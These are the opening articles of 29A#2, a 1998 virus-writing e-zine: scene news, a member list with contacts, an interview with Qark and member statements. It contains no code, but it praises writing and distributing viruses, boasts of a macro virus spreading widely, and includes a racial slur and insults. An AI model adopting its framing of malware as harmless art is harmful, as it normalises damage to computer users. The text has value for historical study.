Introduction to 29A#2 > Mister Sandman/29A Friday 13th, december of 1996, at 6:66am... 29A#1 is officially released to the public. It was undoubtly a magic date. But not as magic as friday 13th, which is a special day for viruses, of february, in 1998, at 6:66pm... this was the final release date/time of 29A#2, and the most curious thing is, we had never thought about letting such a coincidence happen... but it did. In this evil year (666*3=1998), who knows what else might happen in the scene? It has passed over a year since our first issue was released, last december in 1996. However this does not mean, like many people say, that we "release one issue per year". No, that's not fucking true... we've spent one year in order to release 29A#2 but that doesn't mean we will do that again. Lots of circumstances drove us to be late, such as: some members doing the military service, major changes and internal reestructuration, and most important of all: the necessity to spend a lot of time on I+D work in order to start the way in the so called "new school" (Win32). It's easy to notice now that, in most of the cases, those who could not understand these reasons were either kids with no necessity of doing the military service (by now) or coders who are not still interested on spending their efforts on Win32. You can find people out there claiming they "release 3 or 4 zines per year, instead of 1", harassing you, making pressure and/or stupid jokes about the reasons which make your zine get delayed, and so on. But the funniest thing is they pay so much attention to your ass, so they do not pay any at theirs and then get grasped, and it's their zine which gets delayed because of the same reasons they were joking about a few months ago. Being serious now, it is important to say that making comparisons about quantity is very easy. It is also important to remember tho that YAM for instance, released three issues in their eight months of life. We are not speaking about quantity, but about quality. And also about contents plus continent, working in a proffesional way, and offering interesting and innovating articles and viruses to our readers. We do our best and we think it's ok, you judge :) Like Jacky Qwerty, in a speedtalking, hypergesticulating Tarantino-like way says, "this second issue of 29A is full of hot new ground-breaking kick-ass stuff from top to bottom" - or that's what we think, it's up to you to tell us whether we're right or wrong at this. However nobody can negate the fact that we have developed for this issue completely new and unseen stuff like, for instance, the new (definitive) Win32 techniques, not only for infection but also for residency, stealth, error handling, etc. We're publishing here as well the hottest disassemblies, engines, tools, tutorials and, of course viruses of our own, including the first multiprocessor/multiplatform infector, the first virus which executes backwards, the first boot infector that uses PMODE features, the most spread baby in the world right now (CAP), and lots of completely original-featured viruses, which, together with the rest of the articles, we hope you'll read and enjoy. We hadn't released anything for over a year until this issue of 29A was uploaded to our FTP and eventually made publically available, and that is something like saying that you'll find the work of a whole year, here inside. From now onwards things will change, and we hope we will release our future issues within shorter periods of time. And this will probably mean that, at least for us, "something better than 29A#2" will almost become an oxymoron. However we will try, as it was one of our initial intentions, to make every future issue of 29A better than the previous one(s). About the scene there's a very important thing to say: it's alive, and it's more active than it has ever been, in my (humble) opinion. Besides the fact that lots of new groups have emerged, which is something always happens, we can see many important virus groups such as iKx, SLAM, SVL, Stealth, and so

on (so on=the ones i've unintentionally forgotten), as well as, for instance, magazines based on external collaborations without any group supporting them, ie Sources of Kaos. As you can see there's a lot of competence and it is pretty obvious that there's still a lot to do in the scene ;) And i think this is all by now... there is a separate article, called "News since 29A#1", in which we try to describe more or less what has happened in the scene and in 29A as part of it, since our first issue was released. Now it's time just to wish you will enjoy this new issue of 29A, and to ask you not to forget to read any of our articles, we hope you'll like them. "We're pleased if you're pleased" :)

Mister Sandman, bring me a dream.

News since 29A#1 > Mister Sandman/29A In a whole year it's obvious to say that many things happened. And it would be a real fuck to try to sum them all up in this article, so we'll only try to write a brief report about the most important events which took place in all this time. In fact there's nothing too interesting here, just some kind of curious news which may seem funny or at least not boring to you. For us, they were great and amazing experiences we hope we'll go thru again. First of all, after the release of 29A#1, was the discovery of some bugs in the article browser and some errors in a few articles. Our first e-zine was just a test and i think it was a pretty good first step. And it meant a big help for us in order to get some experience about magazine releasing. There was as well kind of a "lack of fame", what forced us to be lame in some aspects of the magazine (in the esthetic side) such as the sucking ANSI i had to draw myself in less than 30 minutes before releasing the zine. Many long conversations about this and other aspects of 29A took place, while our holidays (the VX ones) finished and we had to restart writing viruses. It was nice however to have received tons of e-mails from almost every part of the world congratulating us for the work we did in 29A#1. We kept on working on our viruses/articles, and by the same time we started thinking about the idea on developing the so-called "29A Labs", our website located in http://29A.islatortuga.com. Also we stopped connecting to EFnet, and, instead, we started visiting the recently founded spanish IRC network, where we eventually settled after having created our own virus channel. And these changes were not only affecting the group externally, but also internally, as by this time there were as well a lot of new members joining, and other members becoming collaborators. And you may be wondering now what the fuck a collaborator is... well, this is another feature we have implemented in 29A. Now the organization is formed both by members and collaborators. Members are those who have the compromise to write a certain number of articles and/or viruses per an also certain period of time, they are 29A, the virus writing group itself. Collaborators are external VXers who don't have any compromise with us, who write articles or viruses when they feel like that, and who send them to us in order to collaborate with the group. It is important to say that many ex-members due to their inactivity or because of their lack of time were "reclassified" and put as collaborators, instead of members. So, that's the way the group is formed. The official list of members and collaborators follows, including the last-hour additions :) IMPORTANT!!! if any of the e-mail addresses below does not work, try to use cryogen.com instead of islatortuga.com, or vice-versa. It is also important to note that we are probably moving in the next months to 29A.org, so these addresses may become obsolete soon, albeit they'll still exist, and we will keep on checking them from time to time.

-29A MEMBERS- (the VX dream-team) ;) Member name Origin IRC nick E-mail Mister Sandman......... Spain....... MrSandman....... mrsandman@cryogen.com Darkman................ Denmark..... _darkman_....... _darkman_@cryogen.com GriYo.................. Spain....... GriYo............... griyo@cryogen.com Jacky Qwerty........... Peru........ jqwerty........... jqwerty@cryogen.com Rajaat................. UK.......... Rajaat....... rajaat@itookmyprozac.com Reptile................ Canada...... Reptile-... reptile./.29A.fuck@usa.net Super.................. Spain....... Superx.......... super_29A@cryogen.com Tcp.................... Spain....... Tcp................... tcp@cryogen.com Vecna.................. Brazil...... Vecna............ vecna@antisocial.com

Wintermute............. Spain....... Winter..... wintermute@islatortuga.com

-COLLABORATORSCollaborator name Origin IRC nick E-mail Anbal Lecter.......... Spain....... _Anibal_.......................... n/a AVV.................... Spain....... avv................... avv@cryogen.com Heuristic.............. Denmark..... n/a............................... n/a Leugim San............. Spain....... LeugimSan...... leugim_san@cryogen.com Lord Julus............. Romania..... LordJulus..... lordjulus@geocities.com Mr. White.............. Spain....... W666.......... mrwhite@islatortuga.com "Q" the Misanthrope ... USA......... n/a...... q_the_misanthrop@hotmail.com Spanska................ France...... El_Gato........ el_gato@rocketmail.com SSR.................... Russia...... ssr............................... n/a The Slug............... Spain....... the_slug......... the_slug@cryogen.com VirusBuster............ Spain....... VirusBust.......... darknode@oninet.es Ypsilon................ Spain....... Ypsilon........... ypsilon@cryogen.com Z0MBiE................. Russia...... Z0MBiE............................ n/a

Now that these important news have been told, it is time to start reporting the trivial events. I would first mention our appearances in the media. The first one was in PC Revue (?), a slovakian paper-printed magazine, where we could read a brief comment about my AntiCARO virus. After this, we received via Internet an e-mail from a guy called Javier Guerrero, who heads a virus oriented section in a spanish paper-printed magazine called PCmana. We had some chats about what we (29A+him) exactly wanted, and after that short period of time, a full-color, four-page article about the virus scene and 29A appeared in PCmana, which is one of the most popular computer magazines in Spain. In the next month, he dedicated another -even longer- article to the analysis of my virus Torero, and two months ago we were mentioned in an article dedicated to virus payloads, as before last summer we had talked with him about the idea of writing such an article, and provided him with some of the most known virus payloads. Besides, we have been interviewed by many other media, and we're waiting right now for more public appearances. These plans include our probable presence in a TV program!, plus the already confirmed announcement of the release of 29A#2 in PCmana, and some article(s) in another spanish paper-printed computer magazine (the best sold i think), called PC-Actual. But this all is a surprise we would not like to unveal by now... just keep on visiting the 29A Labs! ;) These are, btw, some excerpts of the article about us in PCmana:

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8 On cover: "Exclusive interview to spanish virus creators" Index : "[...] we offer to you a very interesting interview with two members of a spanish group of virus creators, called 29A. In an informal chat, our guests describe their methods, their history, and their future plans, as well as their opinions about the national and international virus scene". Page 141: "Nowadays, 29A is, internationally, the most important virus creating group, as well as the first and unique one from Spain". Page 142: "Writing viruses the way we do in 29A is to code for art and entertainment, not for effectiveness and destruction (Mr.Sandman)". - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8

The whole article has been converted also into a webpage, so everybody owning a browser may check it out at the official website of PCmana, together with other articles 29A was mentioned in:

(*) http://www.canaldinamic.es/PCMANIA/PC057/VI/pc057vivirus0000.html (*) http://www.canaldinamic.es/PCMANIA/PC058/VI/pc058vivirus0000.html (*) http://www.canaldinamic.es/PCMANIA/PC061/VI/pc061vivirus0000.html

Other funny event took place last summer, in Madrid. We celebrated the very first european VX meeting, albeit it was initially supposed to be a meeting only for 29Aers. However that's what it eventually became, as most of those VXers who were supposed to come finally couldn't, because of several different reasons. For instance, Rajaat planned to go by car from UK till Luxembourg, where he'd meet CoKe and then come to Spain. A completely unfortunate last-hour crash the same day he was leaving the UK messed every plan and made impossible to meet them... driving while being stoned... you know ;) The only foreigner we could meet was Spanska, from France. After having met everybody we went to a restaurant and had our meal. Then we went for a walk to a cybercaf where we connected to IRC and had some fun on-line, and that is when we decided to split for meeting later in order to go party. Some of us went to the most famous square in Madrid, Plaza Mayor, were we could sit in a bar and try to write a virus together, it was a pretty funny thing albeit we couldn't finish it (too much heat) :) Other people such as GriYo or Spanska decided to go their way in order to have a rest, so they could have their energies on top when going party. However, this was the last time any of us saw Spanska, he felt asleep in his car until the next day :) We remet at 22:00h or so in a McDonald's, and then went to some pubs and night bars, including GriYo's... and our party stopped around 5:30h or so, with some of us (especially GriYo and i) a little bit drunk :) It was a great experience we'll repeat this summer, first in Madrid and later -hopefully- in Amsterdam. But this time things will be much more different, and besides we already know for sure right now that b0z0, Darkman, Reptile, Rajaat, and Spanska are coming, so we are sure it'll be impossible to stop laughing and having fun for an only minute. And there are also some rumors, btw, about the possibility of organizing a ganja-smoking contest so we may know at last who the fuck is the king, god or whatever of ganja ;) And last but not least, like every year, the SIMO convention (an enterprise based computer exposition, with stands and so on) took place in Madrid, and 29A couldn't miss it ;) This time it was GriYo, Wintermute, Mr. White (collaborator), and i who represented the group. It was nice to meet personally the developers of Panda, the most important spanish AV product. They were in every moment very kind and proved that it is possible to have a good relationship with "the other side". In this case, it was VX and AV who shared a funny and friendly chat, for some minutes. We could also visit the stands of other AV products, such as F-Prot, AVP, TBAV, Scan, etc, but it was good enough to stop at them and have some laughs... there were only salesmen, so it would have been a loss of time to try to speak with them :P When they saw us laughing at them they became completely astonished :) And this is all, more or less... there's another event about to come, which deals with the cellebration of the release of 29A#2, but i guess the report of this party will be part of 29A#3, so... wait until then!

Mister Sandman, bring me a dream.

29A distro sites > Mister Sandman/29A In order to know the most recent news in 29A, look for our latest releases, and be able to download binaries of our viruses as soon as they're made publically available, don't hesitate to go visit our "29A Labs", the official website of the group, at http://29A.islatortuga.com. Please note that we're moving soon to http://www.29A.org. However 29A.islatortuga.com will keep on working for a long time until we complete our "migration". If what you want is to chat with us you can always try at IRC, as we use to spend a lot of time in the #virus channel of Hispanet, the spanish network. Connect to one of the servers below and look for us, our nicknames are listed in the "News since 29A#1" article:

orion.irc-hispano.org............... pleyades.irc-hispano.org............ vega.irc-hispano.org................ fenix.irc-hispano.org............... pegasus.irc-hispano.org............. saturno.irc-hispano.org............. marte.irc-hispano.org............... mercurio.irc-hispano.org............ ganimedes.irc-hispano.org........... pulsar.irc-hispano.org.............. gaia.irc-hispano.org................ sirius.irc-hispano.org.............. europa.irc-hispano.org.............. aire.irc-hispano.org................ titan.irc-hispano.org............... jupiter.irc-hispano.org.............

Arrakis server Arrakis server Arrakis server Arrakis server Milenium server ERGOS server Minorisa server Mundiva server EUI UPV server RedesTB server Argo server Servicom server CTV server Catalunya.Net server InforEspaa server Lleida Networks server

Since 29A#1 was released many sites (both webs and boards) showed their interest on distributing officially 29A. If want to join the list of 29A distribution sites, just e-mail either Darkman or me (you can find our address in the "News since 29A#1" article) and specify in your message: the name of your website/board and its address/phone number. And then you'll appear in the following list, when updated:

Web site/Board name Address/Phone 29A Labs (world hq)............................. http://29A.islatortuga.com Cicatrix site (usa hq)............... http://www.cyberstation.net/~cicatrix SiZiF's site (.yu hq)............... http://solair.eunet.yu/~sizif/29A.html Dejanu's site (.ro hq)................. http://www.rotravel.com/dejanu/29A/ Arrested Development (euro hq).............................. +31-773-547477 Black Adder (.il hq)......................................... +972-651-4404 BlueDemon BBS (.mx hq)...................................... +52-461-555-19 Dark Node (.es hq)....................................... +34-(9)86-564-053 Edison's Temple......................................... +34-(9)1-406-03-72 FaLCoN BBS (.br hq)........................................ +55-11-875-9838 IX BBS (.de hq)............................................. +49-6074-68390 Satanic Brain (.ar hq)....................................... +54-13-837480 The Frynge (.ca hq)........................................ +1-604-763-6314 Toxic Delusions (.za hq)................................... +27-24-852-5008 UiS (.my hq)................................................ +60-352-107-72

Due to a data loss at least 2-3 sites couldn't be added, as it was impossible to recontact them in order to get again their data. We in the staff hope they're reading this and then will get in touch again.

Mister Sandman, bring me a dream.

Our greetings > Mister Sandman/29A Greetings go this time to... _Anibal_ 00FAh avv b0z0 CaptZero Casio Cicatrix CoKe FJP Galar Galindo giGGler God@rky Greenline iiriv Int13h jtr kdkd-666 Kid_Chaos lLeugimSan LordJulus LovinGOD LuisM Maverick MDriller mgl Murkry nick Omega666 Owl[FS] Pedro piCarDPoltergst "Q" qark QuantumG rretch RAIDERS rebyc ROLF sbringer ShadSeek Shumway SiZiF Skeeve242 Sokrates Spanska SSR StarZer0 the_slug TheWizard trgvalkie VDaemon VirusBust : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : we miss your great sense of humour on IRC ;) still translating games into spanish for EA? :P so happy you finally got a girlfriend :) hope the fuckin t-shirt arrives soon... yours rocks ;) why are people like you so motherfucking anal? learn and sing Madonna's "Like A Virgin" :P keep the *best* work up, man, you rule! your computer is now stoned (same as you, heh) you're an incult, Daft Punk roqs ;) not drunk anymore, girlfriend... really Galar? ;) is your height still 81cms? (greeting from Super) we all live in a love chaaat! -> R's ruin, hehe miss you and your cool website :( ce mai faci? esti nca viu? yodel again! :) so long no see, dude learn cheli and win a prize ;) we all are happy you're ok again what about your life, man??? i really miss you :( jqwerty+you+me=latin sex machines! hope to see you this summer in Madrid ;) still working on that cookie monster? vindecatori roq!!! :))) i promised you'll be here... so here it is :) the OS-migration man, hehehe ;) Universe+Orgasmatron rulez (greeting from Vecna) forget DOS and get into the new school :P greetings are the most important section ;) hope to see you more often on IRC wanna send greetings to your gramma? :) hope you and your BBS are still alive :) thinking on the anti[sm] coalition? how many RedBulls have you drunk tonite? (Super) don't get too stoned when you come to Spain ;) expressos and capuccinos rule, heh? what must you do to convince people? be back... (666th time somebody asks you) still interested on Linux stuff? love that crazy dutch radio reporter ;) ---pareces un feto de ballena, lamepollas!!! really getting a paid travel to Acapulco? forgot what IRC stands for? :) greetings because of being GriYo's inspiration what can i say to one of my idols? you should come more to Hispanet ;) more gypsies working at Tabacalera? :) i promised i'd send that to you... ;) becoming a millionaire with your AV? ;) don't even think on speaking about exams! ;) still lost in Madrid? :P russkaya viruskaya energya!!! ;) i'm working in a GameBoy infector, hehe ;) aaaarrggghhh, the $#%!@ military service use a debugger instead of cut&paste :P does this seem good enough to you? try to spice some horse up with Avecrem :) heh, treilea salut n limba romna :) happy being the "keeper of the virii"? ;)

W666 ww0rker Ypsilon Z0MBiE

: : : :

what about that movie you were writing? still married as far as i know... that's a record! you start looking serious, but keep on coding! :P what will get infected next? txt? :)

Reptile's greetings... oYirG b0z0 Kid_Chaos piCarDReptileScorpion retch : : : : : : : schizo! change nick! got the shirt? :P fascist Fujimori sucks badly! mooha! ;) bwaha! rhabarber... *** You were kicked from #virus by blah0 (banned) Hey you gimp, is it fun to work in a dungeon?! You hermaphrodizeeen bitch! Stupid fascist!

Rajaat besides wants to greet: Rhincewind, The Unforgiven, Antigen, Priest, and Metabolis, hoping to recontact them in the near future. We would like also to send special greetings to Javier Guerrero (thanks for all, man!), Bernardo Quintero (great work coming soon heh?), our friends at Panda Software (eat this!!! :P), and of course, to all our buddies at #hack in Hispanet, especially: BINARIA, DarkNail, mainboard (also his girlfriend, Icar) and Case_Zer0 (the ones i go out with more often in Madrid), also to PhiSk, for his loyalty and a big favor i still owe, La_Santa (heheh, my cyberwife) and to my best friends there (or at least, those ones i can remember right now - alphabetical order): _TaNiS_, |AkratA|, |AmandA|, |aRuSHa|, |fit0|, Akira, BiLLsUcKs, Clarisita, dairo, deadrose, Goku, Jany, Mia (welcome to Jack Rabbit Slim's) ;) NecronoiD, RAGE_666, SiLbY, Sr-aSpid and VaW (not a #hack addict tho). If you are not included here, don't think you are less important than the above for us... sometimes we even forget ourselves!

Thanks to... Exobit Artqvo Khroma Mentat Tcp The Slug Tuk Spanska : : : : : : : : democoding group who programmed the intro ANSI logo and graphics of the intro (Exobit) main writing of the intro code (Exobit) music modules of the intro (Exobit) file browser coding, configuration, bug fixes article reader coding, bug fixes 29A official logo, used in intro and ANSI screensaver, based in his Cosmos virus

Mister Sandman, bring me a dream.

Legal stuff > Mister Sandman/29A Not many changes since 29A#1 so... eat more or less the same text :P Erhhhmm... well, i really hate to do this kind of things but it's necessary anyway so... ok, let's suffer a bit to make my lawyers happy :) Albeit most of our readers are supposed to have more than one virus, and to be even able to code viruses by themselves so they ain't the typical lamers who are looking for destructive code in order to fuck some computers at the school they "study" in we are conscious about the fact that exists a little and very unprobable risk to fall in the greasy hands of one of these gimps, so we'd like to make clear that the only reason which drives 29A to release this magazine is the basic principle of the educational purposes. As Qark said, "if we don't hurt the community, community won't hurt us" ;) We are not responsible of any damage caused due to the misuse of the information (articles/viruses) released in this issue of 29A, just same as somebody who makes knives isn't responsible if some schizo uses one of the knives to kill another person or to cut his dick off, got what we mean? If so, go ahead and enjoy the magazine. Otherwise just get the fuck out :)

Mister Sandman, bring me a dream.

Interview with Qark > Mister Sandman/29A For this second issue of 29A, we decided to interview Qark, one of the best virus writers ever (maybe the best?), who left VLAD and the scene about one year ago. Albeit his lack of free time, this very good friend of mine was eventually able to make possible to bring you now this great oportunity to know him better. We all miss you, dude. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8 29A> Ok, Qark... this is the classic first question of almost every inter29A> view... tell me why did you choose your nick When Metabolis and I started out with VLAD we had local scene nicks that everyone knew, so we had to get new ones. (Obviously meta wasn't always called meta). When I first jumped into irc for #virus, every nick i picked was always taken, so I thought to myself "What nick could I possibly pick that noone will ever use ?", and picked Qark - because it defies the laws of English by dropping the 'u'. But why "Qark" out of all the "Q" words ? I don't know.. I can't think of any other "Q" words to be honest. 29A> When and with 'what' did you start computing? I didn't own a computer until after I left highschool. (A few years back). My first computer was a mighty 8088 XT with 20 Meg hard disk and EGA monitor :) 29A> And when did you first know about a computer virus (first experience, 29A> with which virus(es), etc)? The first I ever heard about computer viruses was when TZ's X-Fungus virus infected Suncorp (a local bank) on the radio. The first virus I ever encountered in the flesh was 1575 (green caterpiller) on someones computer. I took a copy home so that I could work out how to make a virus of my own but it was beyond me at the time. 29A> In what computer languages can you code? ASM, PAS, SQL, Modula-2 and some C. 29A> Describe yourself (phisically, morally... however... even sexually if 29A> you dare) :) Umm White, Male, average height, brown hair, blue-green-hazel (something) eyes. I'm very conservative morally - viruses are a bit of an anomally in my personality. 29A> Ok, now about viruses... tell me 29A> the ones you like most which ones have you coded, and/or

Let me see.. I've written a whole heap of viruses. Father, Mother, Sister, Brother (Incest family - Very lame) - VLAD#1 Actually mother wasn't too bad. It still stealths everything. VLAD virus, Republic, Meningitis - VLAD#2 Pretty lame still, although my flash bios infector was a nifty idea. Hemlock, Megastealth - VLAD#3 Both these viruses were pretty cool even if somewhat buggy.

Winsurfer, Goodtimes - VLAD#4 Winsurfer was a big breakthrough for Quantum and I so it is one of my favourite virii. Horsa, Ph33r - VLAD#5 I liked both of these virii. Horsa was one of the hardest things I've ever written due to the mathematics involved so I like it, and Ph33r is the first multi-OS (kind of) virus so I liked it too. (Quantum wrote the memory routines for that one) Gilgamesh, tracevir, 386 virus - VLAD#6 Pretty ordinary viruses, but my VSTE (my file entry point tunneling engine) was a new concept so I kind of liked it, even if it has been done better since. Padania, goodbye - VLAD#7 Padania was good. Goodbye sucked. Quantum and I have worked on a couple of Win95 viruses together. Win95.Punch and one in memory of TZ.. 29A> Btw, about VLAD (unavoidable question) :) you left the group... you 29A> said you didn't have the time for doing other things... explain it 29A> better, please... did you get a girlfriend? :) By "other things" I meant "anything". rest of your life goes to hell. Spend your time vladding and the

And I do have a lovely woman who takes up a sizeable chunk of my time :) luckily for me she likes viruses :) 29A> What about your personal future projects? Some more win95 viruses are on the cards. I did the vxd routines in a couple of win95 viruses so I'm still coding every now and then.. 29A> And more thingies about VLAD... could you tell me something about its 29A> story (who, when, why decided to create it, etc)? I'm pretty vague about it, but I think it went like this: Meta read ir#2 and thought "cool, im gonna start my own virus group and call it vlad". At this stage I didn't know him at all. A day later he was chatting to the sysop of the local warez board about his latest group when he was put in touch with me. And voila thats how it started. Meta had his own shareware bbs where he was the good-guy sysop, while in a secret area was the vlad virus section. There we would swap code for our latest direct-action virii :) When we got enough dross ready to produce vlad1 I jumped on the bus and the train and went out to his place to put it all together. We met for the first time at the train station. Nothing much happened at his place apart from the magazine production. The main thing I remember is it being freezing cold .. we were working on it until the early hours of the morning. Somewhere along the track meta met TZ and invited him to our private vlad conference on his bbs. We'd discuss virii techniques.. Sometime later we went onto IRC and our story is well known since then..

29A> Which is/are your favourite virus(es)? RDA.fighter is probably my favourite, followed by starship. The new virus by Quantum and I is really cool :) near you :) coming to a hard disk

29A> Do you think the perfect virus exists or might be ever coded? No.. the whole idea of a perfect virus is stupid I think. 29A> How will the 'viruses of the future' look in your opinion? It will be a resident win95/NT infector. 29A> Ok, now let's have a look at the 29A> is the AV you like most? AVP is pretty good. other side... AVs and AVers. Which

Its win95 version really needs a scanning VXD though.

29A> Heh... one question is enough for those niggas ;) now about the virus 29A> scene... give me your point of view about it (old groups, new groups, 29A> who's cool, who sucks... you know) :) Firstly, VLAD is cool :) Nuke, rabid and yam were all lame.. but trident and p/s were good. IR were always my favourite group but I don't like IRG much.. 29A are way cool :) 29A> Finally, just send a greet to someone, say something, sing, write a 29A> poem , pull yourself :)... dunno, whatever you want. This is your 29A> free space :) RIP TZ :( Greets fly out to Metabolis and Quantumg and all the people I like. Also a kiss to a certain girl :) - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8 Good luck, Qark... especially with that girl ;)

Mister Sandman, bring me a dream.

Words from Jacky Qwerty > Jacky Qwerty/29A First of all, i would like to send some short comentz and general greetz to the good and bad virus scene. Yes, i think there exists such diference and thats something that should be "pointed" out. Apart from this i'll take the chance to describe my articlez, virusez and utilitiez included in this 29A issue as well as my true purpose on writin and spreadin out this knowledge.

The two sidez of virus scene Yes, in my humble opinion, i think there is a "good" virus scene, one which is continuosly lookin for new infection ideaz, new platformz and new file formatz to infect. Just for the simple chalenge it poses by itself, not for that stupid nonsense apetite for destruction. Thats childish rubish and we dont like that. We rather enjoy foolin F-Potatoe's last protection or TBAV heuristicz or discoverin Microsoft's untold secretz, etc. This is what we like. This is the good virus scene and we'll stay this way for a long time. The other side is the "bad" virus scene, which is made of vandalz who have childish programin habitz. They move and act by the simple "minimum effort" principle. They rather enjoy randomly writin or formatin a hard drive, than squeezin both skull and brainz out in an atempt to code some more creative and interestin stuff, not the awful boresome shit they're acustomed to. For the former purpose, i'd strongly recomend to download the AVP enciclopedia DOS edition, and take a look at all the "kick ass" virus demoz it containz. Needless to say, I, as a VXer and member of the 29A group team, have nothin to do with this "bad" side of the virus scene and be sure i will reject any chance to become a "vandal" for dayz to come. Did u stick that Bontchy! #8P

Greetz to all VXerz Warm greetz to all those creative VX coderz around the world who use their brainz and imagination writin fancy creative payloadz - harmless graphicz, soundz, etc - inside their lil' creepy binary creaturez, you all rock! ;) No greetz at all to the increasin number of lamerz and wannabeez who feel they are the bad guyz and best coderz on earth just by writin destructive nonsense rubish and wipin out compz at skool or friendz, you all suck! :( As bein part of the first group, i really hope you enjoy this 29A#2 isue as it is full of hot new ground-breakin kick-ass stuff from top to bottom ;)

Quick description For my part i have writen and coded some nifty Win32 (WinNT/Win95/Win32s) virusez: (1) Win32.Jacky, the very first Win32 infector. (2) Win32.Cabanas, the very first resident, stealth, antidebuged, antiheuristic Win32 virus. (3) DogPaw, a simple but powerful DOS virus, which is able to infect DOS, Win3.1, Win95, WinNT and OS/2 aplicationz via a recently discovered backdoor, thanx Casio. (4) WM.CAP, my first and only macro virus writen as an entrance to the macro stuff world, simple in structure (who said complex?), but very powerful and infectious by nature - heck i didnt know it would become so comon, blame Microsoft for their stupidity -. This is all with respect to my virusez. I have also prepared a couple of articlez about macro stuff, they are named (1) Macro virus tricks, and (2) WordMacro.CAP virus description. The first

article deals with two known limitationz with actual macro virusez and then proposes solutionz for them. The second article gives a full description of a real macro virus and serves as a good compliment for the first article. Finally, i have writen two especially useful utilitiez for Win32 (with C source code included): (1) GETPROC, a Win32 console aplication very useful for beginerz, which also serves as a compliment for the PE infection tutorial. And (2) PEWRSEC, a simple DOS program which will be very useful for you Win32 ASM coderz once you understand the benefitz of a R/W code section on a PE file: you will be able to include the first generation sample of your Win32 virus in the code section, as you usually did in DOS, and you will also be able to debug it with symbolic information included along with the source code. And last but not least, i have prepared myself some useful INC filez for DOS and Win32: (1) USEFUL.inc, (2) MZ.inc, (3) WIN32API.inc and (4) PE.inc. This include filez will make more sense once u have delved yerself into the Win32 world.

Scope and Purpose All of these virusez/articlez/utilitiez were all coded with just one goal in mind: to make sure all this information will be given to "otherz" before i leave the scene or the world at worst. I mean, dont let your own knowledge be buried along with your body, spread it out before you leave this world. If you're smart enough and really understand this, then you are almost ready to learn from otherz. Next is that you should be moved or pushed to "learn" just by the simple educational purpose or the chalenge it poses by itself. Then you'll be ready to teach your knowledge and otherz will learn from you. Needless to say, i wouldnt like at all to know that one of my virusez has escaped from this zine coz you didnt understand this. Please dont be a lamer. Now, Enjoy! (c) 1997 Jacky Qwerty/29A.

What is happening in IR/G? > Rajaat / 29A Now talking Rajaat [IR/G]...

Preface It has now been half a year ago when our magazine got out, and since then you haven't heard much from us anymore... Why? I hope to cover some of the things that happened in IR/G and what the current status is (as far as I know, that is).

Sepultura's departure Shortly after the release of IR#8 Sepultura, our main organizer and backbone of IR/G decided to leave the scene altogether. I do miss his programming skills that I don't have. Although I don't blame him, his departure was in my eyes the beginning of the end of IR/G as I know it. I hereby want to thank him for all the things he has done for me and for IR/G.

No backbone With the departure of Sepultura we also lost our talent to organise. Without this backbone, we weren't able to bring out any magazine after IR#8. We tried to find another person in our group with the ability and will to organise, yet we couldn't find/trick someone into taking that task upon him. Without any organisation, a group cannot be in my view.

Hate to code Not being motivated very much, I found myself unable to program very much. My time being consumed by college I had a little time to research virus-related issues. All I could do is think of nice tricks, program them and comment them a bit, but I could not find the heart to make a total virus for it. This left me with a huge pack of tricks, which I haven't used in viruses yet. Eventually I hope I can find the motivation and time to put all these tricks together in one big virus, which will probably be my last virus I will make. This is not caused by a lack of interest, and of course I will stay in the scene trying to think of new tricks and innovate ideas.

Prologue Due to the circumstances and the overall quality of the viruses produced by IR/G I think it suits me and them best that I leave the group and continue the path of virus writing on myself, contributing things to various groups. I hope that the other people in IR/G won't be mad about my decision to leave them. I wish them all the best, and hereby my promise that this is not the last time they will hear from me.

Thanks Given the opportunity here I would like to thank quite a few people who have supported me in the past and hopefully will stay to do so in the future. The Unforgiven, for his many email conversations, excellent ideas on human nature and beliefs, and, most importantly his friendship during the time. I hope I will be able to meet you sometime. Rogue, for showing his excellent

code examples, although I've never witnessed any program of him finished in the wild, save for one. Most probably a badass to other but a friend to me. Mister Sandman, to whom I gave this article in order to publish it in their second magazine (they beat us *grin*). Sepultura, for his organising skills and trying to keep the whole lot together. I could thank a lot more people, but I think that I must keep it short, because nobody is interested in it save for the people who are actually thanked.

And now talking Rajaat / 29A...

Last update It sure looks like that when I write some article, it always seems to get outdated when magazines don't get released as quickly as anticipated (sorry folks, couldn't resist joking about it). But since the time I wrote the upper a few things happened. You probably have read now somewhere in this magazine that I've become a member of 29A! My hate to code went away but that doesn't mean I've plenty of times to code, but I'll do my best and see what I can have in store for you.

What the hell am I up to? To be honest, I don't know. I have here about 5 unfinished programming projects I should finish soon, and I hope I will have the time at my disposal for finishing them. Anyway, I'm proud to be a 29Aer and I hope I can keep up the group's high standard of virus coding.

And how about Immortal Riot? I wish I knew, I think the best thing my friend The Unforgiven and his comrades can do is split from Genesis again (in my eyes it's history) and go on their own again, should they feel like coding again. I hope that you, the reader, will once again witness the excellent magazines of our "hjltar i snn" (heroes in the snow).

Rajaat / 29A

Envy makes dorks resuscitate > Mister Sandman/29A It has passed one year or so since IRG#8 (actually IRG#1, but many people seem to think with their ass) was released. And happily that's the last time we had the chance to hear about a pampered child whose protagonism and egocentrism desire reached its real highlight. You know who he is. He retired because he "did not have enough time to keep on leading IRG", as school sucked most of his free time. Well... for a long time we were almost forced to swallow his childish attitude, his deic-wannabe behavior, and his lots of attempts to suck the whole attention everytime, everywhere (haven't you ever hated to read his stupid introductions to somebody else's articles published in IRG#8?). And we had to read BULLSHIT like this from him: - - - - - - - - - - - - - - - - - - - [...] The magazine is about 1.4 meg, of articles. Unlike some 'virus' magazines / music files to impress. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8 which about 99% of which is actual we dont need 500k viewers / intros - - - - - - - - - - - - - - - - ->8

